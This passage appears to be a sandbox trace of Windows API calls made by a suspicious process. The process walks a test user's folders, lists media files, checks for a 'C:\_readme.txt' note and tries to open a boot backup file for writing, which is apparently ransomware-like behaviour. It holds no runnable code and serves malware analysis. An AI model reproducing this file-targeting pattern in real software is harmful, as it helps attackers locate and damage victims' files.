(pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0227.793] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0227.793] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.793] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.793] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.793] PathFindFileNameW (pszPath="") returned="" [0227.793] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.795] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.795] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0227.795] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0227.795] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0227.795] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0227.795] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0227.795] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.796] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.796] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\") returned="Gg6LaR4dxDzOQomZJ1UL\\" [0227.796] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0227.796] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.796] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.796] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.796] PathFindFileNameW (pszPath="") returned="" [0227.796] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb139ed60, ftCreationTime.dwHighDateTime=0x1d5e375, ftLastAccessTime.dwLowDateTime=0x2cf49ce0, ftLastAccessTime.dwHighDateTime=0x1d5deab, ftLastWriteTime.dwLowDateTime=0x2cf49ce0, ftLastWriteTime.dwHighDateTime=0x1d5deab, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.799] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb139ed60, ftCreationTime.dwHighDateTime=0x1d5e375, ftLastAccessTime.dwLowDateTime=0x2cf49ce0, ftLastAccessTime.dwHighDateTime=0x1d5deab, ftLastWriteTime.dwLowDateTime=0x2cf49ce0, ftLastWriteTime.dwHighDateTime=0x1d5deab, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.799] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x569034e0, ftCreationTime.dwHighDateTime=0x1d5dcaa, ftLastAccessTime.dwLowDateTime=0xc6d322b0, ftLastAccessTime.dwHighDateTime=0x1d5dc39, ftLastWriteTime.dwLowDateTime=0xc6d322b0, ftLastWriteTime.dwHighDateTime=0x1d5dc39, nFileSizeHigh=0x0, nFileSizeLow=0xe911, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3557nrWiSL8Oztuk2v.mp3", cAlternateFileName="3557NR~1.MP3")) returned 1 [0227.799] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb748cc70, ftCreationTime.dwHighDateTime=0x1d5e137, ftLastAccessTime.dwLowDateTime=0x57370fc0, ftLastAccessTime.dwHighDateTime=0x1d5d9d7, ftLastWriteTime.dwLowDateTime=0x57370fc0, ftLastWriteTime.dwHighDateTime=0x1d5d9d7, nFileSizeHigh=0x0, nFileSizeLow=0x12ea0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6E50reyJxYm.wav", cAlternateFileName="6E50RE~1.WAV")) returned 1 [0227.799] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a1e2d0, ftCreationTime.dwHighDateTime=0x1d5e762, ftLastAccessTime.dwLowDateTime=0x3d051030, ftLastAccessTime.dwHighDateTime=0x1d5e6ec, ftLastWriteTime.dwLowDateTime=0x3d051030, ftLastWriteTime.dwHighDateTime=0x1d5e6ec, nFileSizeHigh=0x0, nFileSizeLow=0xa483, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dbHnWPIPAcwCYg3Bdmu.mp3", cAlternateFileName="DBHNWP~1.MP3")) returned 1 [0227.799] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b1d1580, ftCreationTime.dwHighDateTime=0x1d5dbd1, ftLastAccessTime.dwLowDateTime=0x7adfff30, ftLastAccessTime.dwHighDateTime=0x1d5e4c8, ftLastWriteTime.dwLowDateTime=0x7adfff30, ftLastWriteTime.dwHighDateTime=0x1d5e4c8, nFileSizeHigh=0x0, nFileSizeLow=0x7d19, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j-9 8ML8KY7J4.mp3", cAlternateFileName="J-98ML~1.MP3")) returned 1 [0227.799] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42c19d00, ftCreationTime.dwHighDateTime=0x1d5e781, ftLastAccessTime.dwLowDateTime=0x6e82140, ftLastAccessTime.dwHighDateTime=0x1d5e0bb, ftLastWriteTime.dwLowDateTime=0x6e82140, ftLastWriteTime.dwHighDateTime=0x1d5e0bb, nFileSizeHigh=0x0, nFileSizeLow=0x121b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="M19pxLEndmqvY AcHQ.mp3", cAlternateFileName="M19PXL~1.MP3")) returned 1 [0227.799] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91861630, ftCreationTime.dwHighDateTime=0x1d5e517, ftLastAccessTime.dwLowDateTime=0x944faa0, ftLastAccessTime.dwHighDateTime=0x1d5e569, ftLastWriteTime.dwLowDateTime=0x944faa0, ftLastWriteTime.dwHighDateTime=0x1d5e569, nFileSizeHigh=0x0, nFileSizeLow=0x12166, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rM_fq7OOza3eITH8.m4a", cAlternateFileName="RM_FQ7~1.M4A")) returned 1 [0227.799] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ed6d280, ftCreationTime.dwHighDateTime=0x1d5dd8e, ftLastAccessTime.dwLowDateTime=0x545d5c40, ftLastAccessTime.dwHighDateTime=0x1d5df50, ftLastWriteTime.dwLowDateTime=0x545d5c40, ftLastWriteTime.dwHighDateTime=0x1d5df50, nFileSizeHigh=0x0, nFileSizeLow=0x144a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y1jISSChT2WEecUSrE0s.m4a", cAlternateFileName="Y1JISS~1.M4A")) returned 1 [0227.799] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ed6d280, ftCreationTime.dwHighDateTime=0x1d5dd8e, ftLastAccessTime.dwLowDateTime=0x545d5c40, ftLastAccessTime.dwHighDateTime=0x1d5df50, ftLastWriteTime.dwLowDateTime=0x545d5c40, ftLastWriteTime.dwHighDateTime=0x1d5df50, nFileSizeHigh=0x0, nFileSizeLow=0x144a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y1jISSChT2WEecUSrE0s.m4a", cAlternateFileName="Y1JISS~1.M4A")) returned 0 [0227.799] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.800] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.800] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vbTY960\\") returned="vbTY960\\" [0227.800] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0227.800] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.800] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.800] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.800] PathFindFileNameW (pszPath="") returned="" [0227.800] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vbTY960\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x278e4030, ftCreationTime.dwHighDateTime=0x1d5de33, ftLastAccessTime.dwLowDateTime=0x7dbaf380, ftLastAccessTime.dwHighDateTime=0x1d5d8b2, ftLastWriteTime.dwLowDateTime=0x7dbaf380, ftLastWriteTime.dwHighDateTime=0x1d5d8b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.801] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x278e4030, ftCreationTime.dwHighDateTime=0x1d5de33, ftLastAccessTime.dwLowDateTime=0x7dbaf380, ftLastAccessTime.dwHighDateTime=0x1d5d8b2, ftLastWriteTime.dwLowDateTime=0x7dbaf380, ftLastWriteTime.dwHighDateTime=0x1d5d8b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.801] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d9e4e0, ftCreationTime.dwHighDateTime=0x1d5e4b2, ftLastAccessTime.dwLowDateTime=0xd8b7f440, ftLastAccessTime.dwHighDateTime=0x1d5e0be, ftLastWriteTime.dwLowDateTime=0xd8b7f440, ftLastWriteTime.dwHighDateTime=0x1d5e0be, nFileSizeHigh=0x0, nFileSizeLow=0xc813, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5vtSd.wav", cAlternateFileName="")) returned 1 [0227.801] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8073210, ftCreationTime.dwHighDateTime=0x1d5df98, ftLastAccessTime.dwLowDateTime=0xb7a014a0, ftLastAccessTime.dwHighDateTime=0x1d5dbdb, ftLastWriteTime.dwLowDateTime=0xb7a014a0, ftLastWriteTime.dwHighDateTime=0x1d5dbdb, nFileSizeHigh=0x0, nFileSizeLow=0x68e1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H1p6Q94-hZHIiHNtL.m4a", cAlternateFileName="H1P6Q9~1.M4A")) returned 1 [0227.801] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1f05320, ftCreationTime.dwHighDateTime=0x1d5dd83, ftLastAccessTime.dwLowDateTime=0xa5c3afd0, ftLastAccessTime.dwHighDateTime=0x1d5e441, ftLastWriteTime.dwLowDateTime=0xa5c3afd0, ftLastWriteTime.dwHighDateTime=0x1d5e441, nFileSizeHigh=0x0, nFileSizeLow=0xa623, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="L70E2.m4a", cAlternateFileName="")) returned 1 [0227.801] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1f05320, ftCreationTime.dwHighDateTime=0x1d5dd83, ftLastAccessTime.dwLowDateTime=0xa5c3afd0, ftLastAccessTime.dwHighDateTime=0x1d5e441, ftLastWriteTime.dwLowDateTime=0xa5c3afd0, ftLastWriteTime.dwHighDateTime=0x1d5e441, nFileSizeHigh=0x0, nFileSizeLow=0xa623, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="L70E2.m4a", cAlternateFileName="")) returned 0 [0227.801] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.802] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.802] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\") returned="Xb4anhaDsw_nEnBFeS\\" [0227.802] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0227.802] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.802] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.802] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.802] PathFindFileNameW (pszPath="") returned="" [0227.802] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x461909e0, ftCreationTime.dwHighDateTime=0x1d5dec4, ftLastAccessTime.dwLowDateTime=0xa565df90, ftLastAccessTime.dwHighDateTime=0x1d5dcc6, ftLastWriteTime.dwLowDateTime=0xa565df90, ftLastWriteTime.dwHighDateTime=0x1d5dcc6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.804] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x461909e0, ftCreationTime.dwHighDateTime=0x1d5dec4, ftLastAccessTime.dwLowDateTime=0xa565df90, ftLastAccessTime.dwHighDateTime=0x1d5dcc6, ftLastWriteTime.dwLowDateTime=0xa565df90, ftLastWriteTime.dwHighDateTime=0x1d5dcc6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.804] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3766b590, ftCreationTime.dwHighDateTime=0x1d5da29, ftLastAccessTime.dwLowDateTime=0x78512300, ftLastAccessTime.dwHighDateTime=0x1d5e5f1, ftLastWriteTime.dwLowDateTime=0x78512300, ftLastWriteTime.dwHighDateTime=0x1d5e5f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-wYl9Wxaf_FQLu8dRQB5", cAlternateFileName="-WYL9W~1")) returned 1 [0227.805] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.806] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.806] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\") returned="_dqq7i08G7zkmy4eWB\\" [0227.806] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0227.806] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.806] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.806] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.806] PathFindFileNameW (pszPath="") returned="" [0227.806] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66b38ff0, ftCreationTime.dwHighDateTime=0x1d5e517, ftLastAccessTime.dwLowDateTime=0xc0ae7fa0, ftLastAccessTime.dwHighDateTime=0x1d5e5f4, ftLastWriteTime.dwLowDateTime=0xc0ae7fa0, ftLastWriteTime.dwHighDateTime=0x1d5e5f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.809] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.810] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.810] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\") returned="g1CuCps yZIAOwjCa\\" [0227.810] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0227.810] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.810] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.810] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.810] PathFindFileNameW (pszPath="") returned="" [0227.810] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37f59a00, ftCreationTime.dwHighDateTime=0x1d5e65c, ftLastAccessTime.dwLowDateTime=0x42b5a5c0, ftLastAccessTime.dwHighDateTime=0x1d5e576, ftLastWriteTime.dwLowDateTime=0x42b5a5c0, ftLastWriteTime.dwHighDateTime=0x1d5e576, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.813] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.814] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.814] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\") returned="PCPKs0u\\" [0227.814] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0227.814] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.814] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.814] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.814] PathFindFileNameW (pszPath="") returned="" [0227.814] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88546410, ftCreationTime.dwHighDateTime=0x1d5e146, ftLastAccessTime.dwLowDateTime=0x7f6b8a00, ftLastAccessTime.dwHighDateTime=0x1d5dc31, ftLastWriteTime.dwLowDateTime=0x7f6b8a00, ftLastWriteTime.dwHighDateTime=0x1d5dc31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.817] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.818] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.818] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.818] PathFindFileNameW (pszPath="") returned="" [0227.818] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.819] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.819] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.819] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.819] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0227.819] PathFileExistsW (pszPath="C:\\_readme.txt") returned 1 [0227.819] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x31de130 [0227.820] PathFindExtensionW (pszPath="C:\\bootmgr") returned="" [0227.820] PathFindExtensionW (pszPath="C:\\BOOTSECT.BAK") returned=".BAK" [0227.820] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.823] PathFindExtensionW (pszPath="C:\\hiberfil.sys") returned=".sys" [0227.823] PathFindExtensionW (pszPath="C:\\pagefile.sys") returned=".sys" [0227.823] PathFindExtensionW (pszPath="C:\\_readme.txt") returned=".txt" [0227.823] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.823] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.823] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda58 [0227.823] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.824] 